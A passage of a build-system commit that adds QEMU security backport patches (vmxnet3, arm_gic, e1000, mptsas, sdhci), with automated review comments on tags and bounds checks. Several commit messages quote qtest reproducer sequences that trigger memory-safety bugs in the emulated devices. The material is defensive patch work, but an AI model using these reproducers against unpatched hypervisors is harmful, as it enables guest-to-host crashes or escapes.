+@@ -1483,6 +1487,9 @@ static void vmxnet3_activate_device(VMXNET3State *s)
+ /* TXC ring */
+ pa = VMXNET3_READ_TX_QUEUE_DESCR64(d, qdescr_pa, conf.compRingBasePA);
+ size = VMXNET3_READ_TX_QUEUE_DESCR32(d, qdescr_pa, conf.compRingSize);
++ if (size > VMXNET3_TC_RING_MAX_SIZE) {
++ size = VMXNET3_TC_RING_MAX_SIZE;
++ }
+ vmxnet3_ring_init(d, &s->txq_descr[i].comp_ring, pa, size,
+ sizeof(struct Vmxnet3_TxCompDesc), true);
+ VMXNET3_RING_DUMP(VMW_CFPRN, "TXC", i, &s->txq_descr[i].comp_ring);
+@@ -1524,6 +1531,9 @@ static void vmxnet3_activate_device(VMXNET3State *s)
+ /* RX rings */
+ pa = VMXNET3_READ_RX_QUEUE_DESCR64(d, qd_pa, conf.rxRingBasePA[j]);
+ size = VMXNET3_READ_RX_QUEUE_DESCR32(d, qd_pa, conf.rxRingSize[j]);
++ if (size > VMXNET3_RX_RING_MAX_SIZE) {
++ size = VMXNET3_RX_RING_MAX_SIZE;
++ }
+ vmxnet3_ring_init(d, &s->rxq_descr[i].rx_ring[j], pa, size,
+ sizeof(struct Vmxnet3_RxDesc), false);
+ VMW_CFPRN("RX queue %d:%d: Base: %" PRIx64 ", Size: %d",
+@@ -1533,6 +1543,9 @@ static void vmxnet3_activate_device(VMXNET3State *s)
+ /* RXC ring */
+ pa = VMXNET3_READ_RX_QUEUE_DESCR64(d, qd_pa, conf.compRingBasePA);
+ size = VMXNET3_READ_RX_QUEUE_DESCR32(d, qd_pa, conf.compRingSize);
++ if (size > VMXNET3_RC_RING_MAX_SIZE) {
++ size = VMXNET3_RC_RING_MAX_SIZE;
++ }
+ vmxnet3_ring_init(d, &s->rxq_descr[i].comp_ring, pa, size,
+ sizeof(struct Vmxnet3_RxCompDesc), true);
+ VMW_CFPRN("RXC queue %d: Base: %" PRIx64 ", Size: %d", i, pa, size);
+--
+2.29.2
+
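Review bot: The MTU check added in vmxnet3_activate_device() is an `assert()` on a value read from guest shared memory, so a guest that supplies an out-of-range MTU aborts the QEMU process instead of having the value rejected; the upper bound is also written as `s->mtu < VMXNET3_MAX_MTU`, which excludes the maximum itself. A guest-error path such as `if (s->mtu < VMXNET3_MIN_MTU || s->mtu > VMXNET3_MAX_MTU) { return; }`, ideally with a guest-error log line, avoids the abort; whether an early return leaves the device in a consistent state needs checking, as the function continues outside the hunks. The four ring-size clamps bound only the upper end, so a zero or undersized ring is still passed to vmxnet3_ring_init(). The header tag `Upstream-Status: Acepted [...]` is misspelled and points at a mailing-list post rather than a commit; if the fix was merged upstream in a different form, the backport should follow that commit and use `Upstream-Status: Backport [<upstream commit>]`.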
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-20221.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-20221.patch
new file mode 100644
index 0000000000..46c9ab4184
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-20221.patch
@@ -0,0 +1,67 @@
+From edfe2eb4360cde4ed5d95bda7777edcb3510f76a Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Philippe=20Mathieu-Daud=C3=A9?= <f4bug@amsat.org>
+Date: Sun, 31 Jan 2021 11:34:01 +0100
+Subject: [PATCH] hw/intc/arm_gic: Fix interrupt ID in GICD_SGIR register
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+Per the ARM Generic Interrupt Controller Architecture specification
+(document "ARM IHI 0048B.b (ID072613)"), the SGIINTID field is 4 bit,
+not 10:
+
+ - 4.3 Distributor register descriptions
+ - 4.3.15 Software Generated Interrupt Register, GICD_SG
+
+ - Table 4-21 GICD_SGIR bit assignments
+
+ The Interrupt ID of the SGI to forward to the specified CPU
+ interfaces. The value of this field is the Interrupt ID, in
+ the range 0-15, for example a value of 0b0011 specifies
+ Interrupt ID 3.
+
+Correct the irq mask to fix an undefined behavior (which eventually
+lead to a heap-buffer-overflow, see [Buglink]):
+
+ $ echo 'writel 0x8000f00 0xff4affb0' | qemu-system-aarch64 -M virt,accel=qtest -qtest stdio
+ [I 1612088147.116987] OPENED
+ [R +0.278293] writel 0x8000f00 0xff4affb0
+ ../hw/intc/arm_gic.c:1498:13: runtime error: index 944 out of bounds for type 'uint8_t [16][8]'
+ SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior ../hw/intc/arm_gic.c:1498:13
+
+This fixes a security issue when running with KVM on Arm with
+kernel-irqchip=off. (The default is kernel-irqchip=on, which is
+unaffected, and which is also the correct choice for performance.)
+
+Cc: qemu-stable@nongnu.org
+Fixes: CVE-2021-20221
+Fixes: 9ee6e8bb853 ("ARMv7 support.")
+Buglink: https://bugs.launchpad.net/qemu/+bug/1913916
+Buglink: https://bugs.launchpad.net/qemu/+bug/1913917
+Reported-by: Alexander Bulekov <alxndr@bu.edu>
+Signed-off-by: Philippe Mathieu-Daudé <f4bug@amsat.org>
+Message-id: 20210131103401.217160-1-f4bug@amsat.org
+Reviewed-by: Peter Maydell <peter.maydell@linaro.org>
+Signed-off-by: Peter Maydell <peter.maydell@linaro.org>
+
+Upstream-Status: Backport
+CVE: CVE-2021-20221
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ hw/intc/arm_gic.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+Index: qemu-4.2.0/hw/intc/arm_gic.c
+===================================================================
+--- qemu-4.2.0.orig/hw/intc/arm_gic.c
++++ qemu-4.2.0/hw/intc/arm_gic.c
+@@ -1455,7 +1455,7 @@ static void gic_dist_writel(void *opaque
+ int target_cpu;
+
+ cpu = gic_get_current_cpu(s);
+- irq = value & 0x3ff;
++ irq = value & 0xf;
+ switch ((value >> 24) & 3) {
+ case 0:
+ mask = (value >> 16) & ALL_CPU_MASK;
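Review bot: `Upstream-Status: Backport` in this patch header names no upstream commit, unlike the neighbouring QEMU patches, which makes the one-line mask change `irq = value & 0xf;` harder to audit against its source. If the hash on the patch's first `From` line is the upstream commit, the tag would read `Upstream-Status: Backport [edfe2eb4360cde4ed5d95bda7777edcb3510f76a]`. The inner diff is also in quilt `Index:` form against `qemu-4.2.0`, so it should be confirmed that it applies at the recipe's QEMU version without fuzz.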
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-20257.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-20257.patch
new file mode 100644
index 0000000000..7175b24e99
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-20257.patch
@@ -0,0 +1,55 @@
+From affdf476543405045c281a7c67d1eaedbcea8135 Mon Sep 17 00:00:00 2001
+From: Jason Wang <jasowang@redhat.com>
+Date: Wed, 24 Feb 2021 13:45:28 +0800
+Subject: [PATCH] e1000: fail early for evil descriptor
+
+During procss_tx_desc(), driver can try to chain data descriptor with
+legacy descriptor, when will lead underflow for the following
+calculation in process_tx_desc() for bytes:
+
+ if (tp->size + bytes > msh)
+ bytes = msh - tp->size;
+
+This will lead a infinite loop. So check and fail early if tp->size if
+greater or equal to msh.
+
+Reported-by: Alexander Bulekov <alxndr@bu.edu>
+Reported-by: Cheolwoo Myung <cwmyung@snu.ac.kr>
+Reported-by: Ruhr-University Bochum <bugs-syssec@rub.de>
+Cc: Prasad J Pandit <ppandit@redhat.com>
+Cc: qemu-stable@nongnu.org
+Signed-off-by: Jason Wang <jasowang@redhat.com>
+
+Upstream-Status: Backport [3de46e6fc489c52c9431a8a832ad8170a7569bd8]
+CVE: CVE-2021-20257
+
+Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com>
+---
+ hw/net/e1000.c | 4 ++++
+ 1 file changed, 4 insertions(+)
+
+diff --git a/hw/net/e1000.c b/hw/net/e1000.c
+index cf22c4f07..c3564c7ce 100644
+--- a/hw/net/e1000.c
++++ b/hw/net/e1000.c
+@@ -670,6 +670,9 @@ process_tx_desc(E1000State *s, struct e1000_tx_desc *dp)
+ msh = tp->tso_props.hdr_len + tp->tso_props.mss;
+ do {
+ bytes = split_size;
++ if (tp->size >= msh) {
++ goto eop;
++ }
+ if (tp->size + bytes > msh)
+ bytes = msh - tp->size;
+
+@@ -695,6 +698,7 @@ process_tx_desc(E1000State *s, struct e1000_tx_desc *dp)
+ tp->size += split_size;
+ }
+
++eop:
+ if (!(txd_lower & E1000_TXD_CMD_EOP))
+ return;
+ if (!(tp->cptse && tp->size < tp->tso_props.hdr_len)) {
+--
+2.29.2
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3392.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3392.patch
new file mode 100644
index 0000000000..45b8a4f1dd
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3392.patch
@@ -0,0 +1,92 @@
+From 3791642c8d60029adf9b00bcb4e34d7d8a1aea4d Mon Sep 17 00:00:00 2001
+From: Michael Tokarev <mjt@tls.msk.ru>
+Date: Mon, 19 Apr 2021 15:42:47 +0200
+Subject: [PATCH] mptsas: Remove unused MPTSASState 'pending' field
+ (CVE-2021-3392)
+MIME-Version: 1.0
+Content-Type: text/plain; charset=utf8
+Content-Transfer-Encoding: 8bit
+
+While processing SCSI i/o requests in mptsas_process_scsi_io_request(),
+the Megaraid emulator appends new MPTSASRequest object 'req' to
+the 's->pending' queue. In case of an error, this same object gets
+dequeued in mptsas_free_request() only if SCSIRequest object
+'req->sreq' is initialised. This may lead to a use-after-free issue.
+
+Since s->pending is actually not used, simply remove it from
+MPTSASState.
+
+Cc: qemu-stable@nongnu.org
+Signed-off-by: Michael Tokarev <mjt@tls.msk.ru>
+Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com>
+Signed-off-by: Philippe Mathieu-Daudé <philmd@redhat.com>
+Reported-by: Cheolwoo Myung <cwmyung@snu.ac.kr>
+Message-id: 20210419134247.1467982-1-f4bug@amsat.org
+Message-Id: <20210416102243.1293871-1-mjt@msgid.tls.msk.ru>
+Suggested-by: Paolo Bonzini <pbonzini@redhat.com>
+Reported-by: Cheolwoo Myung <cwmyung@snu.ac.kr>
+BugLink: https://bugs.launchpad.net/qemu/+bug/1914236 (CVE-2021-3392)
+Fixes: e351b826112 ("hw: Add support for LSI SAS1068 (mptsas) device")
+[PMD: Reworded description, added more tags]
+Signed-off-by: Philippe Mathieu-Daudé <philmd@redhat.com>
+Reviewed-by: Peter Maydell <peter.maydell@linaro.org>
+Signed-off-by: Peter Maydell <peter.maydell@linaro.org>
+
+Upstream-Status: Backport [ https://git.qemu.org/?p=qemu.git;a=commit;h=3791642c8d60029adf9b00bcb4e34d7d8a1aea4d ]
+CVE: CVE-2021-3392
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/scsi/mptsas.c | 6 ------
+ hw/scsi/mptsas.h | 1 -
+ 2 files changed, 7 deletions(-)
+
+diff --git a/hw/scsi/mptsas.c b/hw/scsi/mptsas.c
+index 7416e78..db3219e 100644
+--- a/hw/scsi/mptsas.c
++++ b/hw/scsi/mptsas.c
+@@ -251,13 +251,10 @@ static int mptsas_build_sgl(MPTSASState *s, MPTSASRequest *req, hwaddr addr)
+
+ static void mptsas_free_request(MPTSASRequest *req)
+ {
+- MPTSASState *s = req->dev;
+-
+ if (req->sreq != NULL) {
+ req->sreq->hba_private = NULL;
+ scsi_req_unref(req->sreq);
+ req->sreq = NULL;
+- QTAILQ_REMOVE(&s->pending, req, next);
+ }
+ qemu_sglist_destroy(&req->qsg);
+ g_free(req);
+@@ -303,7 +300,6 @@ static int mptsas_process_scsi_io_request(MPTSASState *s,
+ }
+
+ req = g_new0(MPTSASRequest, 1);
+- QTAILQ_INSERT_TAIL(&s->pending, req, next);
+ req->scsi_io = *scsi_io;
+ req->dev = s;
+
+@@ -1319,8 +1315,6 @@ static void mptsas_scsi_realize(PCIDevice *dev, Error **errp)
+
+ s->request_bh = qemu_bh_new(mptsas_fetch_requests, s);
+
+- QTAILQ_INIT(&s->pending);
+-
+ scsi_bus_new(&s->bus, sizeof(s->bus), &dev->qdev, &mptsas_scsi_info, NULL);
+ }
+
+diff --git a/hw/scsi/mptsas.h b/hw/scsi/mptsas.h
+index b85ac1a..c046497 100644
+--- a/hw/scsi/mptsas.h
++++ b/hw/scsi/mptsas.h
+@@ -79,7 +79,6 @@ struct MPTSASState {
+ uint16_t reply_frame_size;
+
+ SCSIBus bus;
+- QTAILQ_HEAD(, MPTSASRequest) pending;
+ };
+
+ void mptsas_fix_scsi_io_endianness(MPIMsgSCSIIORequest *req);
+--
+1.8.3.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3409-1.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3409-1.patch
new file mode 100644
index 0000000000..d53383247e
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3409-1.patch
@@ -0,0 +1,85 @@
+From b263d8f928001b5cfa2a993ea43b7a5b3a1811e8 Mon Sep 17 00:00:00 2001
+From: Bin Meng <bmeng.cn@gmail.com>
+Date: Wed, 3 Mar 2021 20:26:35 +0800
+Subject: [PATCH] hw/sd: sdhci: Don't transfer any data when command time out
+MIME-Version: 1.0
+Content-Type: text/plain; charset=utf8
+Content-Transfer-Encoding: 8bit
+
+At the end of sdhci_send_command(), it starts a data transfer if the
+command register indicates data is associated. But the data transfer
+should only be initiated when the command execution has succeeded.
+
+With this fix, the following reproducer:
+
+outl 0xcf8 0x80001810
+outl 0xcfc 0xe1068000
+outl 0xcf8 0x80001804
+outw 0xcfc 0x7
+write 0xe106802c 0x1 0x0f
+write 0xe1068004 0xc 0x2801d10101fffffbff28a384
+write 0xe106800c 0x1f 0x9dacbbcad9e8f7061524334251606f7e8d9cabbac9d8e7f60514233241505f
+write 0xe1068003 0x28 0x80d000251480d000252280d000253080d000253e80d000254c80d000255a80d000256880d0002576
+write 0xe1068003 0x1 0xfe
+
+cannot be reproduced with the following QEMU command line:
+
+$ qemu-system-x86_64 -nographic -M pc-q35-5.0 \
+ -device sdhci-pci,sd-spec-version=3 \
+ -drive if=sd,index=0,file=null-co://,format=raw,id=mydrive \
+ -device sd-card,drive=mydrive \
+ -monitor none -serial none -qtest stdio
+
+Cc: qemu-stable@nongnu.org
+Fixes: CVE-2020-17380
+Fixes: CVE-2020-25085
+Fixes: CVE-2021-3409
+Fixes: d7dfca0807a0 ("hw/sdhci: introduce standard SD host controller")
+Reported-by: Alexander Bulekov <alxndr@bu.edu>
+Reported-by: Cornelius Aschermann (Ruhr-Universität Bochum)
+Reported-by: Sergej Schumilo (Ruhr-Universität Bochum)
+Reported-by: Simon Wörner (Ruhr-Universität Bochum)
+Buglink: https://bugs.launchpad.net/qemu/+bug/1892960
+Buglink: https://bugs.launchpad.net/qemu/+bug/1909418
+Buglink: https://bugzilla.redhat.com/show_bug.cgi?id=1928146
+Acked-by: Alistair Francis <alistair.francis@wdc.com>
+Tested-by: Alexander Bulekov <alxndr@bu.edu>
+Tested-by: Philippe Mathieu-Daudé <f4bug@amsat.org>
+Signed-off-by: Bin Meng <bmeng.cn@gmail.com>
+Message-Id: <20210303122639.20004-2-bmeng.cn@gmail.com>
+Signed-off-by: Philippe Mathieu-Daudé <f4bug@amsat.org>
+
+CVE: CVE-2021-3409 CVE-2020-17380
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/qemu/tree/debian/patches/CVE-2021-3409-1.patch?h=ubuntu/focal-security Upstream commit https://github.com/qemu/qemu/commit/b263d8f928001b5cfa2a993ea43b7a5b3a1811e8 ]
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/sd/sdhci.c | 4 +++-
+ 1 file changed, 3 insertions(+), 1 deletion(-)
+
+--- a/hw/sd/sdhci.c
++++ b/hw/sd/sdhci.c
+@@ -316,6 +316,7 @@ static void sdhci_send_command(SDHCIStat
+ SDRequest request;
+ uint8_t response[16];
+ int rlen;
++ bool timeout = false;
+
+ s->errintsts = 0;
+ s->acmd12errsts = 0;
+@@ -339,6 +340,7 @@ static void sdhci_send_command(SDHCIStat
+ trace_sdhci_response16(s->rspreg[3], s->rspreg[2],
+ s->rspreg[1], s->rspreg[0]);
+ } else {
++ timeout = true;
+ trace_sdhci_error("timeout waiting for command response");
+ if (s->errintstsen & SDHC_EISEN_CMDTIMEOUT) {
+ s->errintsts |= SDHC_EIS_CMDTIMEOUT;
+@@ -359,7 +361,7 @@ static void sdhci_send_command(SDHCIStat
+
+ sdhci_update_irq(s);
+
+- if (s->blksize && (s->cmdreg & SDHC_CMD_DATA_PRESENT)) {
++ if (!timeout && s->blksize && (s->cmdreg & SDHC_CMD_DATA_PRESENT)) {
+ s->data_count = 0;
+ sdhci_data_transfer(s);
+ }
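Review bot: The embedded commit message lists `Fixes: CVE-2020-25085` next to CVE-2020-17380 and CVE-2021-3409, but the recipe tag is `CVE: CVE-2021-3409 CVE-2020-17380`, so tooling that reads the `CVE:` line will not count CVE-2020-25085 as addressed by this patch. The same mismatch appears in CVE-2021-3409-2.patch and CVE-2021-3409-3.patch. Unless another patch in the recipe already carries that identifier, the tag would be `CVE: CVE-2021-3409 CVE-2020-17380 CVE-2020-25085`.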
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3409-2.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3409-2.patch
new file mode 100644
index 0000000000..dc00f76ec9
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3409-2.patch
@@ -0,0 +1,103 @@
+From 8be45cc947832b3c02144c9d52921f499f2d77fe Mon Sep 17 00:00:00 2001
+From: Bin Meng <bmeng.cn@gmail.com>
+Date: Wed, 3 Mar 2021 20:26:36 +0800
+Subject: [PATCH] hw/sd: sdhci: Don't write to SDHC_SYSAD register when
+ transfer is in progress
+MIME-Version: 1.0
+Content-Type: text/plain; charset=utf8
+Content-Transfer-Encoding: 8bit
+
+Per "SD Host Controller Standard Specification Version 7.00"
+chapter 2.2.1 SDMA System Address Register:
+
+This register can be accessed only if no transaction is executing
+(i.e., after a transaction has stopped).
+
+With this fix, the following reproducer:
+
+outl 0xcf8 0x80001010
+outl 0xcfc 0xfbefff00
+outl 0xcf8 0x80001001
+outl 0xcfc 0x06000000
+write 0xfbefff2c 0x1 0x05
+write 0xfbefff0f 0x1 0x37
+write 0xfbefff0a 0x1 0x01
+write 0xfbefff0f 0x1 0x29
+write 0xfbefff0f 0x1 0x02
+write 0xfbefff0f 0x1 0x03
+write 0xfbefff04 0x1 0x01
+write 0xfbefff05 0x1 0x01
+write 0xfbefff07 0x1 0x02
+write 0xfbefff0c 0x1 0x33
+write 0xfbefff0e 0x1 0x20
+write 0xfbefff0f 0x1 0x00
+write 0xfbefff2a 0x1 0x01
+write 0xfbefff0c 0x1 0x00
+write 0xfbefff03 0x1 0x00
+write 0xfbefff05 0x1 0x00
+write 0xfbefff2a 0x1 0x02
+write 0xfbefff0c 0x1 0x32
+write 0xfbefff01 0x1 0x01
+write 0xfbefff02 0x1 0x01
+write 0xfbefff03 0x1 0x01
+
+cannot be reproduced with the following QEMU command line:
+
+$ qemu-system-x86_64 -nographic -machine accel=qtest -m 512M \
+ -nodefaults -device sdhci-pci,sd-spec-version=3 \
+ -drive if=sd,index=0,file=null-co://,format=raw,id=mydrive \
+ -device sd-card,drive=mydrive -qtest stdio
+
+Cc: qemu-stable@nongnu.org
+Fixes: CVE-2020-17380
+Fixes: CVE-2020-25085
+Fixes: CVE-2021-3409
+Fixes: d7dfca0807a0 ("hw/sdhci: introduce standard SD host controller")
+Reported-by: Alexander Bulekov <alxndr@bu.edu>
+Reported-by: Cornelius Aschermann (Ruhr-Universität Bochum)
+Reported-by: Sergej Schumilo (Ruhr-Universität Bochum)
+Reported-by: Simon Wörner (Ruhr-Universität Bochum)
+Buglink: https://bugs.launchpad.net/qemu/+bug/1892960
+Buglink: https://bugs.launchpad.net/qemu/+bug/1909418
+Buglink: https://bugzilla.redhat.com/show_bug.cgi?id=1928146
+Tested-by: Alexander Bulekov <alxndr@bu.edu>
+Signed-off-by: Bin Meng <bmeng.cn@gmail.com>
+Message-Id: <20210303122639.20004-3-bmeng.cn@gmail.com>
+Signed-off-by: Philippe Mathieu-Daudé <f4bug@amsat.org>
+
+CVE: CVE-2021-3409 CVE-2020-17380
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/qemu/tree/debian/patches/CVE-2021-3409-2.patch?h=ubuntu/focal-security Upstream commit https://github.com/qemu/qemu/commit/8be45cc947832b3c02144c9d52921f499f2d77fe ]
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/sd/sdhci.c | 20 +++++++++++---------
+ 1 file changed, 11 insertions(+), 9 deletions(-)
+
+--- a/hw/sd/sdhci.c
++++ b/hw/sd/sdhci.c
+@@ -1117,15 +1117,17 @@ sdhci_write(void *opaque, hwaddr offset,
+
+ switch (offset & ~0x3) {
+ case SDHC_SYSAD:
+- s->sdmasysad = (s->sdmasysad & mask) | value;
+- MASKED_WRITE(s->sdmasysad, mask, value);
+- /* Writing to last byte of sdmasysad might trigger transfer */
+- if (!(mask & 0xFF000000) && TRANSFERRING_DATA(s->prnsts) && s->blkcnt &&
+- s->blksize && SDHC_DMA_TYPE(s->hostctl1) == SDHC_CTRL_SDMA) {
+- if (s->trnmod & SDHC_TRNS_MULTI) {
+- sdhci_sdma_transfer_multi_blocks(s);
+- } else {
+- sdhci_sdma_transfer_single_block(s);
++ if (!TRANSFERRING_DATA(s->prnsts)) {
++ s->sdmasysad = (s->sdmasysad & mask) | value;
++ MASKED_WRITE(s->sdmasysad, mask, value);
++ /* Writing to last byte of sdmasysad might trigger transfer */
++ if (!(mask & 0xFF000000) && s->blkcnt && s->blksize &&
++ SDHC_DMA_TYPE(s->hostctl1) == SDHC_CTRL_SDMA) {
++ if (s->trnmod & SDHC_TRNS_MULTI) {
++ sdhci_sdma_transfer_multi_blocks(s);
++ } else {
++ sdhci_sdma_transfer_single_block(s);
++ }
+ }
+ }
+ break;
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3409-3.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3409-3.patch
new file mode 100644
index 0000000000..d06ac0ed3c
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3409-3.patch
@@ -0,0 +1,71 @@
+Backport of:
+
+From bc6f28995ff88f5d82c38afcfd65406f0ae375aa Mon Sep 17 00:00:00 2001
+From: Bin Meng <bmeng.cn@gmail.com>
+Date: Wed, 3 Mar 2021 20:26:37 +0800
+Subject: [PATCH] hw/sd: sdhci: Correctly set the controller status for ADMA
+MIME-Version: 1.0
+Content-Type: text/plain; charset=utf8
+Content-Transfer-Encoding: 8bit
+
+When an ADMA transfer is started, the codes forget to set the
+controller status to indicate a transfer is in progress.
+
+With this fix, the following 2 reproducers:
+
+https://paste.debian.net/plain/1185136
+https://paste.debian.net/plain/1185141
+
+cannot be reproduced with the following QEMU command line:
+
+$ qemu-system-x86_64 -nographic -machine accel=qtest -m 512M \
+ -nodefaults -device sdhci-pci,sd-spec-version=3 \
+ -drive if=sd,index=0,file=null-co://,format=raw,id=mydrive \
+ -device sd-card,drive=mydrive -qtest stdio
+
+Cc: qemu-stable@nongnu.org
+Fixes: CVE-2020-17380
+Fixes: CVE-2020-25085
+Fixes: CVE-2021-3409
+Fixes: d7dfca0807a0 ("hw/sdhci: introduce standard SD host controller")
+Reported-by: Alexander Bulekov <alxndr@bu.edu>
+Reported-by: Cornelius Aschermann (Ruhr-Universität Bochum)
+Reported-by: Sergej Schumilo (Ruhr-Universität Bochum)
+Reported-by: Simon Wörner (Ruhr-Universität Bochum)
+Buglink: https://bugs.launchpad.net/qemu/+bug/1892960
+Buglink: https://bugs.launchpad.net/qemu/+bug/1909418
+Buglink: https://bugzilla.redhat.com/show_bug.cgi?id=1928146
+Tested-by: Alexander Bulekov <alxndr@bu.edu>
+Reviewed-by: Philippe Mathieu-Daudé <f4bug@amsat.org>
+Signed-off-by: Bin Meng <bmeng.cn@gmail.com>
+Message-Id: <20210303122639.20004-4-bmeng.cn@gmail.com>
+Signed-off-by: Philippe Mathieu-Daudé <f4bug@amsat.org>
+
+CVE: CVE-2021-3409 CVE-2020-17380
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/qemu/tree/debian/patches/CVE-2021-3409-3.patch?h=ubuntu/focal-security Upstream commit https://github.com/qemu/qemu/commit/bc6f28995ff88f5d82c38afcfd65406f0ae375aa ]
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/sd/sdhci.c | 3 +++
+ 1 file changed, 3 insertions(+)
+
+--- a/hw/sd/sdhci.c
++++ b/hw/sd/sdhci.c
+@@ -776,8 +776,9 @@ static void sdhci_do_adma(SDHCIState *s)
+
+ switch (dscr.attr & SDHC_ADMA_ATTR_ACT_MASK) {
+ case SDHC_ADMA_ATTR_ACT_TRAN: /* data transfer */
+-
++ s->prnsts |= SDHC_DATA_INHIBIT | SDHC_DAT_LINE_ACTIVE;
+ if (s->trnmod & SDHC_TRNS_READ) {
++ s->prnsts |= SDHC_DOING_READ;
+ while (length) {
+ if (s->data_count == 0) {
+ for (n = 0; n < block_size; n++) {
+@@ -807,6 +808,7 @@ static void sdhci_do_adma(SDHCIState *s)
+ }
+ }
+ } else {
++ s->prnsts |= SDHC_DOING_WRITE;
+ while (length) {
+ begin = s->data_count;
+ if ((length + begin) < block_size) {
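Review bot: Nothing in the visible hunks clears the status bits that sdhci_do_adma() now sets with `s->prnsts |= SDHC_DATA_INHIBIT | SDHC_DAT_LINE_ACTIVE;` and the `SDHC_DOING_READ` / `SDHC_DOING_WRITE` lines. Since CVE-2021-3409-2.patch makes SDHC_SYSAD writes conditional on `!TRANSFERRING_DATA(s->prnsts)`, a path that leaves these bits set would presumably keep the guest locked out of that register, so each exit from the `SDHC_ADMA_ATTR_ACT_TRAN` case should be checked for a matching clear. The function body starts and ends outside the hunks. A comment beside the first assignment naming where the bits are cleared, e.g. `/* cleared when the transfer ends - see <function that ends the transfer> */`, would document the pairing.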
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3409-4.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3409-4.patch
new file mode 100644
index 0000000000..2e49e3bc18
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3409-4.patch
@@ -0,0 +1,52 @@
+Backport of:
+
+From 5cd7aa3451b76bb19c0f6adc2b931f091e5d7fcd Mon Sep 17 00:00:00 2001
+From: Bin Meng <bmeng.cn@gmail.com>
+Date: Wed, 3 Mar 2021 20:26:38 +0800
+Subject: [PATCH] hw/sd: sdhci: Limit block size only when SDHC_BLKSIZE
+ register is writable
+MIME-Version: 1.0
+Content-Type: text/plain; charset=utf8
+Content-Transfer-Encoding: 8bit
+
+The codes to limit the maximum block size is only necessary when
+SDHC_BLKSIZE register is writable.
+
+Tested-by: Alexander Bulekov <alxndr@bu.edu>
+Reviewed-by: Philippe Mathieu-Daudé <f4bug@amsat.org>
+Signed-off-by: Bin Meng <bmeng.cn@gmail.com>
+Message-Id: <20210303122639.20004-5-bmeng.cn@gmail.com>
+Signed-off-by: Philippe Mathieu-Daudé <f4bug@amsat.org>
+
+CVE: CVE-2021-3409 CVE-2020-17380
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/qemu/tree/debian/patches/CVE-2021-3409-4.patch?h=ubuntu/focal-security Upstream commit https://github.com/qemu/qemu/commit/5cd7aa3451b76bb19c0f6adc2b931f091e5d7fcd ]
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/sd/sdhci.c | 14 +++++++-------
+ 1 file changed, 7 insertions(+), 7 deletions(-)
+
+--- a/hw/sd/sdhci.c
++++ b/hw/sd/sdhci.c
+@@ -1137,15 +1137,15 @@ sdhci_write(void *opaque, hwaddr offset,
+ if (!TRANSFERRING_DATA(s->prnsts)) {
+ MASKED_WRITE(s->blksize, mask, extract32(value, 0, 12));
+ MASKED_WRITE(s->blkcnt, mask >> 16, value >> 16);
+- }
+
+- /* Limit block size to the maximum buffer size */
+- if (extract32(s->blksize, 0, 12) > s->buf_maxsz) {
+- qemu_log_mask(LOG_GUEST_ERROR, "%s: Size 0x%x is larger than " \
+- "the maximum buffer 0x%x", __func__, s->blksize,
+- s->buf_maxsz);
++ /* Limit block size to the maximum buffer size */
++ if (extract32(s->blksize, 0, 12) > s->buf_maxsz) {
++ qemu_log_mask(LOG_GUEST_ERROR, "%s: Size 0x%x is larger than "
++ "the maximum buffer 0x%x\n", __func__, s->blksize,
++ s->buf_maxsz);
+
+- s->blksize = deposit32(s->blksize, 0, 12, s->buf_maxsz);
++ s->blksize = deposit32(s->blksize, 0, 12, s->buf_maxsz);
++ }
+ }
+
+ break;
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3409-5.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3409-5.patch
new file mode 100644
index 0000000000..7b436809e9
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3409-5.patch
@@ -0,0 +1,93 @@
+From cffb446e8fd19a14e1634c7a3a8b07be3f01d5c9 Mon Sep 17 00:00:00 2001
+From: Bin Meng <bmeng.cn@gmail.com>
+Date: Wed, 3 Mar 2021 20:26:39 +0800
+Subject: [PATCH] hw/sd: sdhci: Reset the data pointer of s->fifo_buffer[] when
+ a different block size is programmed
+MIME-Version: 1.0
+Content-Type: text/plain; charset=utf8
+Content-Transfer-Encoding: 8bit
+
+If the block size is programmed to a different value from the
